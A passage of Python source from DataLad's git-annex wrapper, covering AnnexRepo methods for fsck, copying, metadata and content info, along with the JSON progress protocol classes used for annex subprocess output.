raise CommandNotAvailableError(\n 'git-annex migrate',\n \"Command 'migrate' is not available in direct mode.\")\n self._call_annex(\n ['migrate'] + (['--backend', backend] if backend else []),\n files=files,\n )\n\n @classmethod\n def get_key_backend(cls, key):\n \"\"\"Get the backend from a given key\"\"\"\n return key.split('-', 1)[0]\n\n @normalize_paths\n def get_file_backend(self, files):\n \"\"\"Get the backend currently used for file(s).\n\n Parameters\n ----------\n files: list of str\n\n Returns\n -------\n list of str\n For each file in input list indicates the used backend by a str\n like \"SHA256E\" or \"MD5\".\n \"\"\"\n\n return [\n p.get('backend', '')\n for p in self.get_content_annexinfo(files, init=None).values()\n ]\n\n @property\n def default_backends(self):\n self.config.reload()\n # TODO: Deprecate and remove this property? It's used in the tests and\n # datalad-crawler.\n #\n # git-annex used to try the list of backends in annex.backends in\n # order. Now it takes annex.backend if set, falling back to the first\n # value of annex.backends. See 4c1e3210f (annex.backend is the new name\n # for what was annex.backends, 2017-05-09).\n backend = self.get_gitattributes('.')['.'].get(\n 'annex.backend',\n self.config.get(\"annex.backend\", default=None))\n if backend:\n return [backend]\n\n backends = self.config.get(\"annex.backends\", default=None)\n if backends:\n return backends.split()\n else:\n return None\n\n # comment out presently unnecessary functionality, bring back once needed\n #def fsck(self, paths=None, remote=None, fast=False, incremental=False,\n # limit=None, annex_options=None, git_options=None):\n def fsck(self, paths=None, remote=None, fast=False,\n annex_options=None, git_options=None):\n \"\"\"Front-end for git-annex fsck\n\n Parameters\n ----------\n paths : list\n Limit operation to specific paths.\n remote : str\n If given, the identified remote will be fsck'ed instead of the\n local repository.\n fast : bool\n If True, typically means that no actual content is being verified,\n but tests are limited to the presence of files.\n \"\"\"\n #incremental : bool or {'continue'} or SCHEDULE\n # If given, `fsck` is called with `--incremental`. If 'continue',\n # `fsck` is additionally called with `--more`, and any other argument\n # is given to `--incremental-schedule`.\n #limit : str or all\n # If the function `all` is given, `fsck` is called with `--all`. Any\n # other value is passed on to `--branch`.\n args = [] if annex_options is None else list(annex_options)\n if fast:\n args.append('--fast')\n if remote:\n args.append('--from={}'.format(remote))\n #if limit:\n # # looks funky, but really is a test if the `all` function was passed\n # # alternatives would have been 1) a dedicated argument (would need\n # # a check for mutual exclusivity with --branch), or 2) a str-type\n # # special values that has no meaning in Git and is less confusing\n # if limit is all:\n # args.append('--all')\n # else:\n # args.append('--branch={}'.format(limit))\n #if incremental == 'continue':\n # args.append('--more')\n #elif incremental:\n # args.append('--incremental')\n # if not (incremental is True):\n # args.append('--incremental-schedule={}'.format(incremental))\n try:\n return self._call_annex_records(\n ['fsck'] + args,\n files=paths,\n git_options=git_options,\n )\n except CommandError as e:\n # fsck may exit non-zero when there are too few known copies\n # callers of whereis are interested in exactly that information,\n # which we deliver via result, not via exception\n return e.kwargs.get('stdout_json', [])\n\n # We need --auto and --fast having exposed TODO\n @normalize_paths(match_return_type=False) # get a list even in case of a single item\n def copy_to(self, files, remote, options=None, jobs=None):\n \"\"\"Copy the actual content of `files` to `remote`\n\n Parameters\n ----------\n files: str or list of str\n path(s) to copy\n remote: str\n name of remote to copy `files` to\n\n Returns\n -------\n list of str\n files successfully copied\n \"\"\"\n warnings.warn(\n \"AnnexRepo.copy_to() is deprecated and will be removed in a \"\n \"future release. Use the Dataset method push() instead.\",\n DeprecationWarning)\n\n # find --in here --not --in remote\n # TODO: full support of annex copy options would lead to `files` being\n # optional. This means to check for whether files or certain options are\n # given and fail or just pass everything as is and try to figure out,\n # what was going on when catching CommandError\n\n if remote not in self.get_remotes():\n raise ValueError(\"Unknown remote '{0}'.\".format(remote))\n\n options = options[:] if options else []\n\n # Note:\n # In case of single path, 'annex copy' will fail, if it cannot copy it.\n # With multiple files, annex will just skip the ones, it cannot deal\n # with. We'll do the same and report back what was successful\n # (see return value).\n # Therefore raise telling exceptions before even calling annex:\n if len(files) == 1:\n # Note, that for isdir we actually need an absolute path (which we don't get via normalize_paths)\n if not isdir(opj(self.path, files[0])):\n # for non-existing paths, get_file_annexinfo() will raise already\n if self.get_file_annexinfo(files[0]).get('key') is None:\n raise FileInGitError(f'No known annex key for a file {files[0]}. Cannot copy')\n\n # TODO: RF -- logic is duplicated with get() -- the only difference\n # is the verb (copy, copy) or (get, put) and remote ('here', remote)?\n if '--key' not in options:\n expected_copys, copy_files = self._get_expected_files(\n files, ['--in', '.', '--not', '--in', remote])\n else:\n copy_files = files\n assert(len(files) == 1)\n expected_copys = {files[0]: AnnexRepo.get_size_from_key(files[0])}\n\n if not copy_files:\n lgr.debug(\"No files found needing copying.\")\n return []\n\n if len(copy_files) != len(files):\n lgr.debug(\"Actually copying %d files\", len(copy_files))\n\n self._maybe_open_ssh_connection(remote)\n annex_options = ['--to=%s' % remote]\n if options:\n annex_options.extend(split_cmdline(options))\n\n # filter out keys with missing size info\n total_nbytes = sum(i for i in expected_copys.values() if i) or None\n\n # TODO: provide more meaningful message (possibly aggregating 'note'\n # from annex failed ones\n results = self._call_annex_records(\n ['copy'] + annex_options,\n files=files, # copy_files,\n jobs=jobs,\n progress=True,\n total_nbytes=total_nbytes,\n )\n results_list = list(results)\n # XXX this is the only logic different ATM from get\n # check if any transfer failed since then we should just raise an Exception\n # for now to guarantee consistent behavior with non--json output\n # see https://github.com/datalad/datalad/pull/1349#discussion_r103639456\n from operator import itemgetter\n failed_copies = [e['file'] for e in results_list if not e['success']]\n good_copies = [\n e['file'] for e in results_list\n if e['success'] and\n e.get('note', '').startswith('to ') # transfer did happen\n ]\n if failed_copies:\n # TODO: RF for new fancy scheme of outputs reporting\n raise IncompleteResultsError(\n results=good_copies, failed=failed_copies,\n msg=\"Failed to copy %d file(s)\" % len(failed_copies))\n return good_copies\n\n @property\n def uuid(self):\n \"\"\"Annex UUID\n\n Returns\n -------\n str\n Returns a the annex UUID, if there is any, or `None` otherwise.\n \"\"\"\n if not self._uuid:\n self._uuid = self.config.get('annex.uuid', default=None)\n return self._uuid\n\n def get_description(self, uuid=None):\n \"\"\"Get annex repository description\n\n Parameters\n ----------\n uuid : str, optional\n For which remote (based on uuid) to report description for\n\n Returns\n -------\n str or None\n None returned if not found\n \"\"\"\n info = self.repo_info(fast=True)\n match = \\\n (lambda x: x['here']) \\\n if uuid is None \\\n else (lambda x: x['uuid'] == uuid)\n\n matches = list(set(chain.from_iterable(\n [\n [r['description'] for r in remotes if match(r)]\n for k, remotes in info.items()\n if k.endswith(' repositories')\n ]\n )))\n\n if len(matches) == 1:\n # single hit as it should\n return matches[0]\n elif len(matches) == 2:\n lgr.warning(\n \"Found multiple hits while searching. Returning first among: %s\",\n str(matches)\n )\n return matches[0]\n else:\n return None\n\n def get_metadata(self, files, timestamps=False, batch=False):\n \"\"\"Query git-annex file metadata\n\n Parameters\n ----------\n files : str or iterable(str)\n One or more paths for which metadata is to be queried. If one\n or more paths could be directories, `batch=False` must be given\n to prevent git-annex given an error. Due to technical limitations,\n such error will lead to a hanging process.\n timestamps: bool, optional\n If True, the output contains a '<metadatakey>-lastchanged'\n key for every metadata item, reflecting the modification\n time, as well as a 'lastchanged' key with the most recent\n modification time of any metadata item.\n batch: bool, optional\n If True, a `metadata --batch` process will be used, and only\n confirmed annex'ed files can be queried (else query will hang\n indefinitely). If False, invokes without --batch, and gives all files\n as arguments (this can be problematic with a large number of files).\n\n Returns\n -------\n generator\n One tuple per file (could be more items than input arguments\n when directories are given). First tuple item is the filename,\n second item is a dictionary with metadata key/value pairs. Note that annex\n metadata tags are stored under the key 'tag', which is a\n regular metadata item that can be manipulated like any other.\n \"\"\"\n def _format_response(res):\n return (\n str(Path(PurePosixPath(res['file']))),\n res['fields'] if timestamps else \\\n {k: v for k, v in res['fields'].items()\n if not k.endswith('lastchanged')}\n )\n\n if not files:\n return\n if batch is False:\n # we can be lazy\n files = ensure_list(files)\n else:\n if isinstance(files, str):\n files = [files]\n # anything else is assumed to be an iterable (e.g. a generator)\n if batch is False:\n for res in self.call_annex_records(['metadata'], files=files):\n yield _format_response(res)\n else:\n # batch mode is different: we need to compose a JSON request object\n batched = self._batched.get('metadata', json=True, path=self.path)\n for f in files:\n res = batched.proc1(json.dumps({'file': f}))\n yield _format_response(res)\n\n def set_metadata(\n self, files, reset=None, add=None, init=None,\n remove=None, purge=None, recursive=False):\n \"\"\"Manipulate git-annex file-metadata\n\n Parameters\n ----------\n files : str or list(str)\n One or more paths for which metadata is to be manipulated.\n The changes applied to each file item are uniform. However,\n the result may not be uniform across files, depending on the\n actual operation.\n reset : dict, optional\n Metadata items matching keys in the given dict are (re)set\n to the respective values.\n add : dict, optional\n The values of matching keys in the given dict appended to\n any possibly existing values. The metadata keys need not\n necessarily exist before.\n init : dict, optional\n Metadata items for the keys in the given dict are set\n to the respective values, if the key is not yet present\n in a file's metadata.\n remove : dict, optional\n Values in the given dict are removed from the metadata items\n matching the respective key, if they exist in a file's metadata.\n Non-existing values, or keys do not lead to failure.\n purge : list, optional\n Any metadata item with a key matching an entry in the given\n list is removed from the metadata.\n recursive : bool, optional\n If False, fail (with CommandError) when directory paths\n are given as `files`.\n\n Returns\n -------\n list\n JSON obj per modified file\n \"\"\"\n return list(self.set_metadata_(\n files, reset=reset, add=add, init=init,\n remove=remove, purge=purge, recursive=recursive))\n\n def set_metadata_(\n self, files, reset=None, add=None, init=None,\n remove=None, purge=None, recursive=False):\n \"\"\"Like set_metadata() but returns a generator\"\"\"\n\n def _genspec(expr, d):\n return [expr.format(k, v) for k, vs in d.items() for v in ensure_list(vs)]\n\n args = []\n spec = []\n for expr, d in (('{}={}', reset),\n ('{}+={}', add),\n ('{}?={}', init),\n ('{}-={}', remove)):\n if d:\n spec.extend(_genspec(expr, d))\n # prefix all with '-s' and extend arg list\n args.extend(j for i in zip(['-s'] * len(spec), spec) for j in i)\n if purge:\n # and all '-r' args\n args.extend(j for i in zip(['-r'] * len(purge), purge)\n for j in i)\n if not args:\n return\n\n if recursive:\n args.append('--force')\n\n # Make sure that batch add/addurl operations are closed so that we can\n # operate on files that were just added.\n self.precommit()\n\n for jsn in self.call_annex_records(\n ['metadata'] + args,\n files=files):\n yield jsn\n\n # TODO: RM DIRECT? might remain useful to detect submods left in direct mode\n @staticmethod\n def _is_annex_work_tree_message(out):\n return re.match(\n r'.*This operation must be run in a work tree.*'\n r'git status.*failed in submodule',\n out,\n re.MULTILINE | re.DOTALL | re.IGNORECASE)\n\n\n def _mark_content_availability(self, info):\n objectstore = self.pathobj.joinpath(\n self.path, GitRepo.get_git_dir(self), 'annex', 'objects')\n for f, r in info.items():\n if 'key' not in r or 'has_content' in r:\n # not annexed or already processed\n continue\n # test hashdirmixed first, as it is used in non-bare repos\n # which be a more frequent target\n # TODO optimize order based on some check that reveals\n # what scheme is used in a given annex\n r['has_content'] = False\n # some keys like URL-s700145--https://arxiv.org/pdf/0904.3664v1.pdf\n # require sanitization to be able to mark content availability\n # correctly. Can't limit to URL backend only; custom key backends\n # may need it, too\n key = _sanitize_key(r['key'])\n for testpath in (\n # ATM git-annex reports hashdir in native path\n # conventions and the actual file path `f` in\n # POSIX, weird...\n # we need to test for the actual key file, not\n # just the containing dir, as on windows the latter\n # may not always get cleaned up on `drop`\n objectstore.joinpath(\n ut.Path(r['hashdirmixed']), key, key),\n objectstore.joinpath(\n ut.Path(r['hashdirlower']), key, key)):\n if testpath.exists():\n r.pop('hashdirlower', None)\n r.pop('hashdirmixed', None)\n r['objloc'] = str(testpath)\n r['has_content'] = True\n break\n\n def get_file_annexinfo(self, path, ref=None, eval_availability=False,\n key_prefix=''):\n \"\"\"Query annex properties for a single file\n\n This is the companion to get_content_annexinfo() and offers\n simplified usage for single-file queries (the result lookup\n based on a path is not necessary.\n\n All keyword arguments have identical names and semantics as\n their get_content_annexinfo() counterparts. See their\n documentation for more information.\n\n Parameters\n ----------\n path : Path or str\n A single path to a file in the repository.\n\n Returns\n -------\n dict\n Keys and values match the values returned by get_content_annexinfo().\n If a file has no annex properties (i.e., a file that is directly\n checked into Git and is not annexed), the returned dictionary is\n empty.\n\n Raises\n ------\n ValueError\n When a given path is not matching a single file, but resolves to\n multiple files (e.g. a directory path)\n NoSuchPathError\n When the given path does not match any file in a repository\n \"\"\"\n info = {k: v\n for k, v in self.get_content_annexinfo(\n [path],\n init=None,\n ref=ref,\n eval_availability=eval_availability).items()}\n if len(info) > 1:\n raise ValueError(\n \"AnnexRepo.get_file_annexinfo() can handle handle a single \"\n f\"file path, but {path} resolved to {len(info)} paths\")\n elif not info:\n # no error, there is a file, but we know nothing about it\n return {}\n path, props = info.popitem()\n # turn a file not found situation into an exception\n if props.get('success') is False and props.get('note') == 'not found':\n raise NoSuchPathError(path)\n # fold path into the report to give easy access to a normalized,\n # resolved Path instance\n props['path'] = path\n return props\n\n def get_content_annexinfo(\n self, paths=None, init='git', ref=None, eval_availability=False,\n key_prefix='', **kwargs):\n \"\"\"\n Parameters\n ----------\n paths : list or None\n Specific paths to query info for. In `None`, info is reported for all\n content.\n init : 'git' or dict-like or None\n If set to 'git' annex content info will amend the output of\n GitRepo.get_content_info(), otherwise the dict-like object\n supplied will receive this information and the present keys will\n limit the report of annex properties. Alternatively, if `None`\n is given, no initialization is done, and no limit is in effect.\n ref : gitref or None\n If not None, annex content info for this Git reference will be\n produced, otherwise for the content of the present worktree.\n eval_availability : bool\n If this flag is given, evaluate whether the content of any annex'ed\n file is present in the local annex.\n **kwargs :\n Additional arguments for GitRepo.get_content_info(), if `init` is\n set to 'git'.\n\n Returns\n -------\n dict\n The keys/values match those reported by GitRepo.get_content_info().\n In addition, the following properties are added to each value\n dictionary:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory', where 'file'\n is also used for annex'ed files (corrects a 'symlink' report\n made by `get_content_info()`.\n `key`\n Annex key of a file (if an annex'ed file)\n `bytesize`\n Size of an annexed file in bytes.\n `has_content`\n Bool whether a content object for this key exists in the local\n annex (with `eval_availability`)\n `objloc`\n pathlib.Path of the content object in the local annex, if one\n is available (with `eval_availability`)\n \"\"\"\n if init is None:\n info = dict()\n elif init == 'git':\n info = super(AnnexRepo, self).get_content_info(\n paths=paths, ref=ref, **kwargs)\n else:\n info = init\n\n if not paths and paths is not None:\n return info\n\n # use this funny-looking option with both find and findref\n # it takes care of git-annex reporting on any known key, regardless\n # of whether or not it actually (did) exist in the local annex.\n if self._check_version_kludges(\"find-supports-anything\"):\n cmd = ['--anything']\n else:\n # --include=* was recommended by Joey in\n # https://git-annex.branchable.com/todo/add_--all___40__or_alike__41___to_find_and_findref/\n cmd = ['--include=*']\n files = None\n if ref:\n cmd = ['findref'] + cmd\n cmd.append(ref)\n else:\n cmd = ['find'] + cmd\n # stringify any pathobjs\n if paths: # we have early exit above in case of [] and not None\n files = [str(p) for p in paths]\n else:\n cmd += ['--include', '*']\n\n for j in self.call_annex_records(cmd, files=files):\n path = self.pathobj.joinpath(ut.PurePosixPath(j['file']))\n rec = info.get(path, None)\n if rec is None:\n # git didn't report on this path\n if j.get('success', None) is False:\n # Annex reports error on that file. Create an error entry,\n # as we can't currently yield a prepared error result from\n # within here.\n rec = {'status': 'error', 'state': 'unknown'}\n elif init is not None:\n # init constraint knows nothing about this path -> skip\n continue\n else:\n rec = {}\n rec.update({'{}{}'.format(key_prefix, k): j[k]\n for k in j if k != 'file' and k != 'error-messages'})\n # change annex' `error-messages` into singular to match result\n # records:\n if j.get('error-messages', None):\n rec['error_message'] = '\\n'.join(m.strip() for m in j['error-messages'])\n if 'bytesize' in rec:\n # it makes sense to make this an int that one can calculate with\n # with\n try:\n rec['bytesize'] = int(rec['bytesize'])\n except ValueError:\n # this would only ever happen, if the recorded key itself\n # has no size info. Even for a URL key, this would mean\n # that the server would have to not report size info at all\n # but it does actually happen, e.g.\n # URL--http&c%%ciml.info%dl%v0_9%ciml-v0_9-all.pdf\n # from github.com/datalad-datasets/machinelearning-books\n lgr.debug('Failed to convert \"%s\" to integer bytesize',\n rec['bytesize'])\n # remove the field completely to avoid ambiguous semantics\n # of None/NaN etc.\n del rec['bytesize']\n if rec.get('type') == 'symlink' and rec.get('key') is not None:\n # we have a tracked symlink with an associated annex key\n # this is only a symlink for technical reasons, but actually\n # a file from the user perspective.\n # homogenization of this kind makes the report more robust\n # across different representations of a repo\n # (think adjusted branches ...)\n rec['type'] = 'file'\n info[path] = rec\n # TODO make annex availability checks optional and move in here\n if eval_availability:\n self._mark_content_availability(info)\n return info\n\n def annexstatus(self, paths=None, untracked='all'):\n \"\"\"\n .. deprecated:: 0.16\n Use get_content_annexinfo() or the test helper\n :py:func:`datalad.tests.utils_pytest.get_annexstatus` instead.\n \"\"\"\n info = self.get_content_annexinfo(\n paths=paths,\n eval_availability=False,\n init=self.get_content_annexinfo(\n paths=paths,\n ref='HEAD',\n eval_availability=False,\n init=self.status(\n paths=paths,\n eval_submodule_state='full')\n )\n )\n self._mark_content_availability(info)\n return info\n\n def _save_add(self, files, git=None, git_opts=None):\n \"\"\"Simple helper to add files in save()\"\"\"\n from datalad.interface.results import get_status_dict\n\n # alter default behavior of git-annex by considering dotfiles\n # too\n # however, this helper is controlled by save() which itself\n # operates on status() which itself honors .gitignore, so\n # there is a standard mechanism that is uniform between Git\n # Annex repos to decide on the behavior on a case-by-case\n # basis\n options = []\n # if None -- leave it to annex to decide\n if git is False:\n options.append(\"--force-large\")\n if on_windows:\n # git-annex ignores symlinks on windows\n # https://github.com/datalad/datalad/issues/2955\n # check if there are any and pass them to git-add\n symlinks_toadd = {\n p: props for p, props in files.items()\n if props.get('type', None) == 'symlink'}\n if symlinks_toadd:\n for r in GitRepo._save_add(\n self,\n symlinks_toadd,\n git_opts=git_opts):\n yield r\n # trim `files` of symlinks\n files = {\n p: props for p, props in files.items()\n if props.get('type', None) != 'symlink'}\n\n expected_additions = None\n if ui.is_interactive:\n # without an interactive UI there is little benefit from\n # progressbar info, hence save the stat calls\n expected_additions = {p: self.get_file_size(p) for p in files}\n\n if git is True:\n yield from GitRepo._save_add(self, files, git_opts=git_opts)\n else:\n for r in self._call_annex_records(\n ['add'] + options,\n files=list(files.keys()),\n # TODO\n jobs=None,\n total_nbytes=sum(expected_additions.values())\n if expected_additions else None):\n yield get_status_dict(\n action=r.get('command', 'add'),\n refds=self.pathobj,\n type='file',\n path=(self.pathobj / ut.PurePosixPath(r['file']))\n if 'file' in r else None,\n status='ok' if r.get('success', None) else 'error',\n key=r.get('key', None),\n message='\\n'.join(r['error-messages'])\n if 'error-messages' in r else None,\n logger=lgr)\n\n def _save_post(self, message, files, partial_commit,\n amend=False, allow_empty=False):\n\n if amend and self.is_managed_branch() and \\\n self.format_commit(\"%B\").strip() == \"git-annex adjusted branch\":\n # We must not directly amend on an adjusted branch, but fix it\n # up after the fact. That is if HEAD is a git-annex commit.\n # Otherwise we still can amend-commit normally.\n # Note, that this may involve creating an empty commit first.\n amend = False\n adjust_amend = True\n else:\n adjust_amend = False\n\n # first do standard GitRepo business\n super(AnnexRepo, self)._save_post(\n message, files, partial_commit, amend,\n allow_empty=allow_empty or adjust_amend)\n # then sync potential managed branches\n self.localsync(managed_only=True)\n if adjust_amend:\n # We committed in an adjusted branch, but the goal is to amend in\n # corresponding branch.\n\n adjusted_branch = self.get_active_branch()\n corresponding_branch = self.get_corresponding_branch()\n old_sha = self.get_hexsha(corresponding_branch)\n\n org_commit_pointer = corresponding_branch + \"~1\"\n author_name, author_email, author_date, \\\n old_parent, old_message = self.format_commit(\n \"%an%x00%ae%x00%ad%x00%P%x00%B\", org_commit_pointer).split('\\0')\n new_env = (self._git_runner.env\n if self._git_runner.env else os.environ).copy()\n # `message` might be empty - we need to take it from the to be\n # amended commit in that case:\n msg = message or old_message\n new_env.update({\n 'GIT_AUTHOR_NAME': author_name,\n 'GIT_AUTHOR_EMAIL': author_email,\n 'GIT_AUTHOR_DATE': author_date\n })\n commit_cmd = [\"commit-tree\",\n corresponding_branch + \"^{tree}\",\n \"-m\", msg]\n if old_parent:\n commit_cmd.extend([\"-p\", old_parent])\n out, _ = self._call_git(commit_cmd, env=new_env, read_only=False)\n new_sha = out.strip()\n\n self.update_ref(\"refs/heads/\" + corresponding_branch,\n new_sha, old_sha)\n self.update_ref(\"refs/basis/\" + adjusted_branch,\n new_sha, old_sha)\n self.localsync(managed_only=True)\n\n def localsync(self, remote=None, managed_only=False):\n \"\"\"Consolidate the local git-annex branch and/or managed branches.\n\n This method calls `git annex sync` to perform purely local operations\n that:\n\n 1. Update the corresponding branch of any managed branch.\n\n 2. Synchronize the local 'git-annex' branch with respect to particular\n or all remotes (as currently reflected in the local state of their\n remote 'git-annex' branches).\n\n If a repository has git-annex's 'synced/...' branches these will be\n updated. Otherwise, such branches that are created by `git annex sync`\n are removed again after the sync is complete.\n\n Parameters\n ----------\n remote : str or list, optional\n If given, specifies the name of one or more remotes to sync against.\n If not given, all remotes are considered.\n managed_only : bool, optional\n Only perform a sync if a managed branch with a corresponding branch\n is detected. By default, a sync is always performed.\n \"\"\"\n branch = self.get_active_branch()\n corresponding_branch = self.get_corresponding_branch(branch)\n branch = corresponding_branch or branch\n\n if managed_only and not corresponding_branch:\n lgr.debug('No sync necessary, no corresponding branch detected')\n return\n\n lgr.debug(\n \"Sync local 'git-annex' branch%s.\",\n \", and corresponding '{}' branch\".format(corresponding_branch)\n if corresponding_branch else '')\n\n synced_branch = 'synced/{}'.format(branch)\n had_synced_branch = synced_branch in self.get_branches()\n cmd = ['sync']\n if remote:\n cmd.extend(ensure_list(remote))\n cmd.extend([\n # disable any external interaction and other magic\n '--no-push', '--no-pull', '--no-commit', '--no-resolvemerge',\n '--no-content'])\n self.call_annex(cmd)\n # a sync can establish new config (e.g. annex-uuid for a remote)\n self.config.reload()\n # cleanup sync'ed branch if we caused it\n if not had_synced_branch and synced_branch in self.get_branches():\n lgr.debug('Remove previously non-existent %s branch after sync',\n synced_branch)\n self.call_git(\n ['branch', '-d', synced_branch],\n )\n\n\nclass AnnexJsonProtocol(WitlessProtocol):\n \"\"\"Subprocess communication protocol for `annex ... --json` commands\n\n Importantly, parsed JSON content is returned as a result, not string output.\n\n This protocol also handles git-annex's JSON-style progress reporting.\n \"\"\"\n # capture both streams and handle messaging completely\n proc_out = True\n proc_err = True\n\n def __init__(self, done_future=None, total_nbytes=None):\n if done_future is not None:\n warnings.warn(\"`done_future` argument is ignored \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n super().__init__()\n # to collect parsed JSON command output\n self.json_out = []\n self._global_pbar_id = 'annexprogress-{}'.format(id(self))\n self.total_nbytes = total_nbytes\n self._unprocessed = None\n\n def add_to_output(self, json_object):\n self.json_out.append(json_object)\n\n def connection_made(self, transport):\n super().connection_made(transport)\n self._pbars = set()\n # overall counter of processed bytes (computed from key reports)\n self._byte_count = 0\n if self.total_nbytes:\n # init global pbar, do here to be on top of first file\n log_progress(\n lgr.info,\n self._global_pbar_id,\n 'Start annex operation',\n # do not crash if no command is reported\n unit=' Bytes',\n label='Total',\n total=self.total_nbytes,\n noninteractive_level=5,\n )\n self._pbars.add(self._global_pbar_id)\n\n def pipe_data_received(self, fd, data):\n if fd != 1:\n # let the base class decide what to do with it\n super().pipe_data_received(fd, data)\n return\n if self._unprocessed:\n data = self._unprocessed + data\n self._unprocessed = None\n # this is where the JSON records come in\n lines = data.splitlines()\n data_ends_with_eol = data.endswith(os.linesep.encode())\n del data\n for iline, line in enumerate(lines):\n try:\n j = json.loads(line)\n except Exception as exc:\n if line.strip():\n # do not complain on empty lines\n if iline == len(lines) - 1 and not data_ends_with_eol:\n lgr.debug(\"Caught %s while trying to parse JSON line %s which might \"\n \"be not yet a full line\", exc, line)\n # it is the last line and fails to parse -- it can/likely\n # to happen that it was not a complete line and that buffer\n # got filled up/provided before the end of line.\n # Store it so that it can be prepended to data in the next call.\n self._unprocessed = line\n break\n # TODO turn this into an error result, or put the exception\n # onto the result future -- needs more thought\n lgr.error('Received undecodable JSON output: %s', line)\n continue\n self._proc_json_record(j)\n\n def _get_pbar_id(self, record):\n # NOTE: Look at the \"action\" field for byte-progress records and the\n # top-level `record` for the final record. The action record as a whole\n # should be stable link across byte-progress records, but a subset of\n # the keys is hard coded below so that the action record can be linked\n # to the final one.\n info = record.get(\"action\") or record\n return 'annexprogress-{}-{}'.format(\n id(self),\n hash(frozenset((k, info.get(k))\n for k in [\"command\", \"key\", \"file\"])))\n\n def _get_pbar_label(self, action):\n # do not crash if no command is reported\n label = action.get('command', '').capitalize()\n target = action.get('file') or action.get('key')\n if target:\n label += \" \" + target\n\n if label:\n from datalad.ui import utils as ui_utils\n\n # Reserving 55 characters for the progress bar is based\n # approximately off what used to be done in the now-removed\n # (948ccf3e18) ProcessAnnexProgressIndicators.\n max_label_width = ui_utils.get_console_width() - 55\n if max_label_width < 0:\n # We're squeezed. Just show bar.\n label = \"\"\n elif len(label) > max_label_width:\n mid = max_label_width // 2\n label = label[:mid] + \" .. \" + label[-mid:]\n return label\n\n def _proc_json_record(self, j):\n # check for progress reports and act on them immediately\n # but only if there is something to build a progress report from\n pbar_id = self._get_pbar_id(j)\n known_pbar = pbar_id in self._pbars\n action = j.get('action')\n\n is_progress = action and 'byte-progress' in j\n # ignore errors repeatedly reported in progress messages. Final message\n # will contain them\n if action and not is_progress:\n for err_msg in action.pop('error-messages', []):\n lgr.error(err_msg)\n\n if known_pbar and (not is_progress or\n j.get('byte-progress') == j.get('total-size')):\n # take a known pbar down, completion or broken report\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished annex action: {}'.format(action),\n noninteractive_level=5,\n )\n self._pbars.discard(pbar_id)\n if is_progress:\n # The final record is yet to come.\n return\n\n if is_progress:\n if not known_pbar:\n # init the pbar, the is some progress left to be made\n # worth it\n log_progress(\n lgr.info,\n pbar_id,\n 'Start annex action: {}'.format(action),\n label=self._get_pbar_label(action),\n unit=' Bytes',\n total=float(j.get('total-size', 0)),\n noninteractive_level=5,\n )\n self._pbars.add(pbar_id)\n log_progress(\n lgr.info,\n pbar_id,\n j.get('percent-progress', 0),\n update=float(j.get('byte-progress', 0)),\n noninteractive_level=5,\n )\n # do not let progress reports leak into the return value\n return\n # update overall progress, do not crash when there is no key property\n # in the report (although there should be one)\n key_bytes = AnnexRepo.get_size_from_key(j.get('key', None))\n if key_bytes:\n self._byte_count += key_bytes\n # don't do anything to the results for now in terms of normalization\n # TODO the protocol could be made aware of the runner's CWD and\n # also any dataset the annex command is operating on. This would\n # enable 'file' property conversion to absolute paths\n self.add_to_output(j)\n\n if self.total_nbytes:\n if self.total_nbytes <= self._byte_count:\n # discard global pbar\n log_progress(\n lgr.info,\n self._global_pbar_id,\n 'Finished annex {}'.format(j.get('command', '')),\n noninteractive_level=5,\n )\n self._pbars.discard(self._global_pbar_id)\n else:\n # log actual progress\n log_progress(\n lgr.info,\n self._global_pbar_id,\n j.get('file', ''),\n update=self._byte_count,\n noninteractive_level=5,\n )\n\n def _prepare_result(self):\n # first let the base class do its thing\n results = super()._prepare_result()\n # now amend the results, make clear in the key-name that these records\n # came from stdout -- may not be important here or now, but it is easy\n # to imagine structured output on stderr at some point\n results['stdout_json'] = self.json_out\n return results\n\n def process_exited(self):\n # take down any progress bars that were not closed orderly\n for pbar_id in self._pbars:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished',\n noninteractive_level=5,\n )\n if self._unprocessed:\n lgr.error(\n \"%d bytes of received undecodable JSON output remain: %s\",\n len(self._unprocessed), self._unprocessed\n )\n super().process_exited()\n\n\nclass GeneratorAnnexJsonProtocol(GeneratorMixIn, AnnexJsonProtocol):\n def __init__(self,\n done_future=None,\n total_nbytes=None):\n GeneratorMixIn.__init__(self)\n AnnexJsonProtocol.__init__(self, done_future, total_nbytes)\n\n def add_to_output(self, json_object):\n self.send_result(json_object)\n\n\nclass GeneratorAnnexJsonNoStderrProtocol(GeneratorAnnexJsonProtocol):\n def __init__(self,\n done_future=None,\n total_nbytes=None):\n GeneratorMixIn.__init__(self)\n AnnexJsonProtocol.__init__(self, done_future, total_nbytes)\n self.stderr_output = bytearray()\n\n def pipe_data_received(self, fd, data):\n if fd == 2:\n self.stderr_output += data\n # let the base class decide what to do with it\n super().pipe_data_received(fd, data)\n\n def process_exited(self):\n super().process_exited()\n if self.stderr_output:\n raise CommandError(\n msg=\"Unexpected stderr output\",\n stderr=self.stderr_output.decode())\n\n\nclass AnnexInitOutput(WitlessProtocol, AssemblingDecoderMixIn):\n proc_out = True\n proc_err = True\n\n def __init__(self, done_future=None, encoding=None):\n WitlessProtocol.__init__(self, done_future, encoding)\n AssemblingDecoderMixIn.__init__(self)\n\n def pipe_data_received(self, fd, byts):\n line = self.decode(fd, byts, self.encoding)\n if fd == 1:\n res = re.search(\"(scanning for .* files)\", line, flags=re.IGNORECASE)\n if res:\n lgr.info(\"%s (this may take some time)\", res.groups()[0])\n elif fd == 2:\n lgr.info(line.strip())\n\n\n@auto_repr(short=False)\nclass BatchedAnnex(BatchedCommand):\n \"\"\"Container for an annex process which would allow for persistent communication\n \"\"\"\n\n def __init__(self, annex_cmd, git_options=None, annex_options=None, path=None,\n json=False, output_proc=None, batch_opt='--batch'):\n if not isinstance(annex_cmd, list):\n annex_cmd = [annex_cmd]\n cmd = \\\n ['git'] + \\\n (git_options if git_options else []) + \\\n ['annex'] + \\\n annex_cmd + \\\n (annex_options if annex_options else []) + \\\n (['--json', '--json-error-messages'] if json else []) + \\\n [batch_opt] + \\\n (['--debug'] if lgr.getEffectiveLevel() <= 8 else [])\n output_proc = \\\n output_proc if output_proc else readline_json if json else None\n super(BatchedAnnex, self).__init__(\n cmd,\n path=path,\n output_proc=output_proc)\n\n\n# TODO: Why was this commented out?\n# @auto_repr\nclass BatchedAnnexes(SafeDelCloseMixin, dict):\n \"\"\"Class to contain the registry of active batch'ed 